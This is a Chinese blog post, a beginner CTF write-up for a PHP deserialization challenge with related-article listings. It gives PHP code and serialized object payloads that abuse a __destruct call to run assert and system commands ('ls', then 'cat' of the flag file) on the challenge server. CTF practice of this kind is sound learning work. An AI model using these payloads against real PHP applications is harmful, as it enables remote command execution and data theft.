CTF php反序化简单的入门题目 (对初学者非常友好,单一考点)

最新推荐文章于 2024-02-22 18:00:44 发布
最新推荐文章于 2024-02-22 18:00:44 发布
阅读量2k 收藏 7
点赞数 1
分类专栏: CTF -WEB 学习 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122196828
版权

地址 :要先注册的

http://www.whalwl.site:8026/

 题目非常明了,只有一个类site 和一个魔法函数_destruct 

unserialize(反序化前自动调用_destruct)

关键 在$a($this->title)

明显的是a参数执行(this->title)

所以在这里可以构造命令执行,利用assert函数执行system系统命令。

构造payload

<?php

class site{
    public $url = 'www.whalwl.com';
    public $name;
    public $title;

    
    
}
$a=new site();
$a->name="assert";
$a->title="system(ls)";
echo(serialize($a));



?>

在线php网站运行

O:4:"site":3:{s:3:"url";s:14:"www.whalwl.com";s:4:"name";s:6:"assert";s:5:"title";s:10:"system(ls)";}

 放在Hackbar里 post参数dage

ls打开目录发现得到了文件名,下面使用cat 命令打开

payload

<?php

class site{
    public $url = 'www.whalwl.com';
    public $name;
    public $title;

    
    
}
$a=new site();
$a->name="assert";
$a->title="system('cat flag_aeb45a3fb5a3d769.txt')";
echo(serialize($a));



?>

 php在线运行

得到最终payload

O:4:"site":3:{s:3:"url";s:14:"www.whalwl.com";s:4:"name";s:6:"assert";s:5:"title";s:39:"system('cat flag_aeb45a3fb5a3d769.txt')";}

获得flag

AAAAAAAAAAAA66
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php长度变尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php长度变尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
从一道CTF题学习PHP漏洞-附件资源
03-02
从一道CTF题学习PHP漏洞-附件资源
【Web方向】 PHP代码审计 CTF题目wp1
wanderer的博客
11-14 1595
好难的题!
CTF-php入门进阶
最新发布
Mssqj的博客
02-22 368
如果一个类中定义了__get()方法,那么当我们试图获取该类的一个不存在或无法访问的属性时,该方法会被自动调用,从而可以对该操作进行处理。类中)去找$a()这种形式的,,找到$bb(),它对应的参数是su,且在类llovetxm里 特征 $*****();首先找切入点-------找到NISA类invoke的eval()函数,并且参数可控,则思路正确,这是一个正确的方向。shell写flag.php就不对了,然而写/flag时就对了,很奇怪,所以不出答案时,多试一试,改一改。,同样改为上一个类的对象。
mon_premier_ctf:CTF初学者的挑战
05-25
我的第一个周大福 您是否想为初学者组织一个Capture The Flag标志? 此仓库适合您! 在这里,您将发现一系列挑战,这些挑战旨在使参与者开始构建参与CTF的最低工具包。 可以在上找到参加者的幻灯片游戏。 在本文档中,您将找到有关以下方面的详细说明: 特征 所有挑战均可通过网络浏览器访问。 用户工作站上没有任何安装。 文字挑战 在浏览器中使用“ Kali like”终端 按需启动专用服务器 SSH或Web类型的服务器 Python代码编辑器和执行 安装并启动服务器 可能有3种安装类型: 零安装:网站http://hacklab.yoloctf.org (该网站已关闭,如果有用,我可以将其备份,让我知道) 安装预配置的VM 从头开始在ubuntu服务器上安装 方法1:零安装 http://hacklab.yoloctf.org 可从http://hacklab.yo
CTFctf中用到的php伪协议总结及例题(持续更)
weixin_52450702的博客
02-03 2655
ctf中用到的php伪协议总结及例题
PHPCTF例题
bwxzdjn的博客
03-25 5777
用代码审计的方式分析一道典型的存在PHP漏洞的案例,加深对魔术方法等相关知识的理解。另外,还会和xss跨站脚本的知识进行融合。
学习笔记【一文打通ctf中的题目
jayq1的博客
07-21 3007
本文包含的各类题目,比如基础的php 字符逃逸 phar Pickle 师傅们轻点喷~
PHP--简单ctf题--pop链(thinkphp5.1.X)漏洞复现
cainiao17441898的博客
07-07 4320
前言: PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,这些都是PHP内置的方法。 __construct 当一个对象创建时被调用 __destruct 当一个对象销毁时被调用 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __call() 在对象上下文中调用不可访问的方法时触发 __callStatic() 在静态上下文中调用不可访问的方法时触发 __get() 用于从不可访问的属性读取数据 __set() 用于将数据写入不可访
CTF-PHP漏洞4-实例理解POP链(经典赛题)
Eason_LYC安全白帽子的成长博客
05-08 2114
悲观者预言失败,十言九中。乐观者创造奇迹,一次即可。一个人的价值,在于他所拥有的。可以不学无术,但不能一无所有!关注WEB安全、网络攻防。我的专栏文章知识点全面细致,逻辑清晰、结合实战,让你在学习路上事半功倍,少走弯路!追求技术至上,这是我们理想中的极乐世界~(关注我即可加入社区)本专栏打破以往CTF速成或就题论题模式。采用。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
php ctf题,CTF---PHP安全考题
weixin_28736145的博客
03-26 667
1.弱类型比较php中有两种比较的符号 == 与 ===1
PHP漏洞详解.rar
02-07
PHP漏洞详解-CTF
ctf php 流量分析题,CTF平台hackit题目分析与解答
weixin_33277215的博客
03-09 460
之前在网上经常看到很多的CTF的练习平台,在加上搞CTF比赛的学弟推荐了这个 CTF平台 。当时在网上看了一下,这个平台推荐的人还是很多的。这个平台是由一个白帽子个人开发的一个平台。趁着这个平台还没有关闭的时候,我抓紧时间来练习一下,找找做CTF比赛的感觉,同时也提升我的渗透能力。当我千辛万苦地做完了之后,发现网上还没有人写这个练习平台的writeup,于是我决定记录下我的做题过程。一方面是为了能...
PHP 基础知识:40 道选择题测试你的掌握程度期末考试必备
laterstage的博客
08-13 1223
下面哪个选项用于在PHP中删除会话(Session)数据?下面哪个选项用于在PHP中将数组转换为JSON字符串?在PHP中,如何向一个已经存在的数组添加一个元素?下面哪个选项用于在PHP中获取数组的最后一个元素?下面哪个选项用于在PHP中删除数组的最后一个元素?在PHP中,如何检查一个数组中是否存在某个键名?下面哪个选项用于在PHP中获取客户端的IP地址?下面哪个选项用于在PHP中获取当前的时间戳?下面哪个选项用于在PHP中格式日期和时间?下面哪个函数用于在PHP中连接到数据库?
CTF-Web25(涉及简单PHP代码审计-基础题)
→_→
09-28 803
25.PHP大法 分析: PHP函数: eregi()函数 —— 不区分大小写的检查一个字符串里是否包含另外一个字符串;可以使用%00截断绕过,匹配数组的话会返回NULL(与本题无关),跟ereg()功能类似; <?php if(eregi("hackerDJ",$_GET[id])) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($_GET[id]); if($.
[NPUCTF2020]ReadlezPHP与assert函数利用
sGanYu
11-23 3042
在URL前添加view-source:即可查看源码 点击/time.php?source跳转如下页面 创建一个HelloPhp类和两个变量$a和$b,将a初始赋值"Y-m-d h:i:s",b初始赋值"date",最后输出$b($a),显然b括号包含a,如果将b赋值为函数,a赋值为命令,是否可以执行需要的命令呢?如果以get方式提交source则终止程,以get方式提交的data则data,所以我们需要传入后的值执行我们需要的命令 我们将a更改为phpinfo(),b更改为...
assert()函数的使用说明
12-17 590
assert宏的原型定义在中,其作用是如果它的条件返回错误,则终止程执行,原型定义: #include void assert( int expression ); assert的作用是现计算表达式 expression ,如果其值为假(即为0),那么它先向stderr打印一条出错信息, 然后通过调用 abort 来终止程运行。 请看下面的程清单badptr.c: #
CTF之萌新学习
bmth666的博客
01-13 4984
概念 数据(变量)(持久) 将一个变量的数据“转换为”字符串,但并不是类型转换,目的是将该字符串储存在本地。相的行为称为的目:使得程间传输对象会更加方便 # 相关函数 ...
CTFPHP基础学习篇(一)
热门推荐
ioik~hk的博客
03-20 1万+
CTFPHP基础。 文章目录 前言 一、PHP是什么? 二、配置PHP环境 三、PHP基础语法介绍 前言 估摸着不少学计算机的同学以及其他专业的小部分同学都对于信息安全感兴趣吧!那对于参加这相关的比赛就应该更有兴趣了。那么我们首先就了解一下下这相关的比赛——CTF(Capture The Flag)。
PHP漏洞 ctfhub
07-28
PHP漏洞是一种常见的Web应用程漏洞,它允许攻击者通过操纵过程来执行恶意代码。这种漏洞通常出现在PHP应用程中,特别是在使用不安全的函数(如`unserialize()`)时。 CTFHub是一个CTF(Capture The Flag)平台,旨在提供安全竞赛和训练平台,供安全爱好者学习和应对各种网络安全挑战。在CTFHub中,可能会涉及到PHP漏洞作为一个题目或挑战,参与者需要通过利用该漏洞来获取目标系统的控制权或敏感信息。 为了防止PHP漏洞,开发人员应该采取以下几个措施: 1. 验证和过滤用户输入:确保的数据来自可信任的来源,并对输入进行严格的验证和过滤,以防止恶意数据的注入。 2. 使用安全的库:使用经过审计和被广泛接受的库,如JSON或Protocol Buffers,而不是不安全的`unserialize()`函数。 3. 最小操作:只必要的数据,并避免不受信任的或未知的数据。 4. 对敏感数据进行加密:如果必须在过程中传输敏感数据,应该对其进行加密,以防止泄露。 希望以上信息对你有所帮助。如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值